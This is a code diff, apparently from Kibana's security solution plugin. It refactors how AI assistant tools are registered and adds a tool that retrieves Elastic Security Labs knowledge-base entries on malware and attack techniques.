@@ -13,7 +13,7 @@ describe('getAssistantTools', () => {
   });
 
   it('should return an array of applicable tools', () => {
-    const tools = getAssistantTools(true);
+    const tools = getAssistantTools({ naturalLanguageESQLToolEnabled: true });
 
     const minExpectedTools = 3; // 3 tools are currently implemented
 
diff --git a/x-pack/plugins/security_solution/server/assistant/tools/index.ts b/x-pack/plugins/security_solution/server/assistant/tools/index.ts
index 181e55353adc7..fa0098dce1eec 100644
--- a/x-pack/plugins/security_solution/server/assistant/tools/index.ts
+++ b/x-pack/plugins/security_solution/server/assistant/tools/index.ts
@@ -14,12 +14,27 @@ import { OPEN_AND_ACKNOWLEDGED_ALERTS_TOOL } from './open_and_acknowledged_alert
 import { ATTACK_DISCOVERY_TOOL } from './attack_discovery/attack_discovery_tool';
 import { KNOWLEDGE_BASE_RETRIEVAL_TOOL } from './knowledge_base/knowledge_base_retrieval_tool';
 import { KNOWLEDGE_BASE_WRITE_TOOL } from './knowledge_base/knowledge_base_write_tool';
+import { SECURITY_LABS_KNOWLEDGE_BASE_TOOL } from './security_labs/security_labs_tool';
 
-export const getAssistantTools = (naturalLanguageESQLToolEnabled: boolean): AssistantTool[] => [
-  ALERT_COUNTS_TOOL,
-  ATTACK_DISCOVERY_TOOL,
-  naturalLanguageESQLToolEnabled ? NL_TO_ESQL_TOOL : ESQL_KNOWLEDGE_BASE_TOOL,
-  KNOWLEDGE_BASE_RETRIEVAL_TOOL,
-  KNOWLEDGE_BASE_WRITE_TOOL,
-  OPEN_AND_ACKNOWLEDGED_ALERTS_TOOL,
-];
+export const getAssistantTools = ({
+  naturalLanguageESQLToolEnabled,
+  assistantKnowledgeBaseByDefault,
+}: {
+  naturalLanguageESQLToolEnabled?: boolean;
+  assistantKnowledgeBaseByDefault?: boolean;
+}): AssistantTool[] => {
+  const tools = [
+    ALERT_COUNTS_TOOL,
+    ATTACK_DISCOVERY_TOOL,
+    naturalLanguageESQLToolEnabled ? NL_TO_ESQL_TOOL : ESQL_KNOWLEDGE_BASE_TOOL,
+    KNOWLEDGE_BASE_RETRIEVAL_TOOL,
+    KNOWLEDGE_BASE_WRITE_TOOL,
+    OPEN_AND_ACKNOWLEDGED_ALERTS_TOOL,
+  ];
+
+  if (assistantKnowledgeBaseByDefault) {
+    tools.push(SECURITY_LABS_KNOWLEDGE_BASE_TOOL);
+  }
+
+  return tools;
+};
diff --git a/x-pack/plugins/security_solution/server/assistant/tools/security_labs/security_labs_tool.ts b/x-pack/plugins/security_solution/server/assistant/tools/security_labs/security_labs_tool.ts
new file mode 100644
index 0000000000000..70e955dda8470
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/assistant/tools/security_labs/security_labs_tool.ts
@@ -0,0 +1,56 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+import { DynamicStructuredTool } from '@langchain/core/tools';
+
+import { z } from '@kbn/zod';
+import type { AssistantTool, AssistantToolParams } from '@kbn/elastic-assistant-plugin/server';
+import { SECURITY_LABS_RESOURCE } from '@kbn/elastic-assistant-plugin/server/routes/knowledge_base/constants';
+import { APP_UI_ID } from '../../../../common';
+
+const toolDetails = {
+  description:
+    'Call this for knowledge from Elastic Security Labs content, which contains information on malware, attack techniques, and more.',
+  id: 'security-labs-knowledge-base-tool',
+  name: 'SecurityLabsKnowledgeBaseTool',
+};
+export const SECURITY_LABS_KNOWLEDGE_BASE_TOOL: AssistantTool = {
+  ...toolDetails,
+  sourceRegister: APP_UI_ID,
+  isSupported: (params: AssistantToolParams): params is AssistantToolParams => {
+    const { kbDataClient, isEnabledKnowledgeBase, modelExists } = params;
+    return isEnabledKnowledgeBase && modelExists && kbDataClient != null;
+  },
+  getTool(params: AssistantToolParams) {
+    if (!this.isSupported(params)) return null;
+
+    const { kbDataClient } = params as AssistantToolParams;
+    if (kbDataClient == null) return null;
+
+    return new DynamicStructuredTool({
+      name: toolDetails.name,
+      description: toolDetails.description,
+      schema: z.object({
+        question: z
+          .string()
+          .describe(
+            `Key terms to retrieve Elastic Security Labs content for, like specific malware names or attack techniques.`
+          ),
+      }),
+      func: async (input, _, cbManager) => {
+        const docs = await kbDataClient.getKnowledgeBaseDocumentEntries({
+          kbResource: SECURITY_LABS_RESOURCE,
+          query: input.question,
+        });
+        // TODO: Token pruning
+        return JSON.stringify(docs).substring(0, 20000);
+      },
+      tags: ['security-labs', 'knowledge-base'],
+      // TODO: Remove after ZodAny is fixed https://github.com/langchain-ai/langchainjs/blob/main/langchain-core/src/tools.ts
+    }) as unknown as DynamicStructuredTool;
+  },
+};
diff --git a/x-pack/plugins/security_solution/server/plugin.ts b/x-pack/plugins/security_solution/server/plugin.ts
index 4e457aafc0651..ab4a213862a5b 100644
--- a/x-pack/plugins/security_solution/server/plugin.ts
+++ b/x-pack/plugins/security_solution/server/plugin.ts
@@ -545,7 +545,12 @@ export class Plugin implements ISecuritySolutionPlugin {
     // Assistant Tool and Feature Registration
     plugins.elasticAssistant.registerTools(
       APP_UI_ID,
-      getAssistantTools(config.experimentalFeatures.assistantNaturalLanguageESQLTool)
+      getAssistantTools({
+        naturalLanguageESQLToolEnabled:
+          config.experimentalFeatures.assistantNaturalLanguageESQLTool,
+        assistantKnowledgeBaseByDefault:
+          config.experimentalFeatures.assistantKnowledgeBaseByDefault,
+      })
     );
     const features = {
       assistantBedrockChat: config.experimentalFeatures.assistantBedrockChat,